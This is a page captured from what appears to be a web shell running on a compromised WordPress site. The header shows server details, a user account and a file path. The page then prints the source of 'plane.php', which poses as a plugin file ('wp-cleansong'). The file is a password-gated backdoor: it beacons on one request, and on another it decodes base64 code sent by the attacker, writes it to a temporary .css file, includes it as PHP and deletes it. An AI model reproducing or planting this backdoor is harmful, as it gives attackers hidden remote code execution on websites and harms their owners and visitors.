HEX
Server: Apache/2
System: Linux server-80-13-140-150.da.direct 5.14.0-362.24.1.el9_3.0.1.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 4 22:31:43 UTC 2024 x86_64
User: cpt (1004)
PHP: 8.1.24
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Upload Files
File: /home/cpt/domains/collectifpourtous.fr/public_html/wp-content/plugins/wp-cleansong/plane.php
<?php
if ( ! defined( 'ABSPATH' ) ) {
        exit; // Exit if accessed directly
    }
if(isset($_GET['song1'])){
        die(md5('song'));
}
if(isset($_POST['song2'])){
      $l1 = uniqid(rand(), true) . '.css';
      @file_put_contents($l1, 'css');
      if(file_exists($l1)){
        if(isset($_POST['stars1'])){
                $d = md5(md5($_POST['stars1']));
                if($d=="b2d5605e835f3e18d50380b90786c032"){
                        $d1=$_POST['stars2'];
                        $d1=base64_decode($d1);
                        @file_put_contents($l1, '<'.'?'.'p'.'hp '. $d1);
                        @include($l1);
                        @file_put_contents($l1, 'css');
                        @unlink($l1);
                        die();
                }
        }
      }
}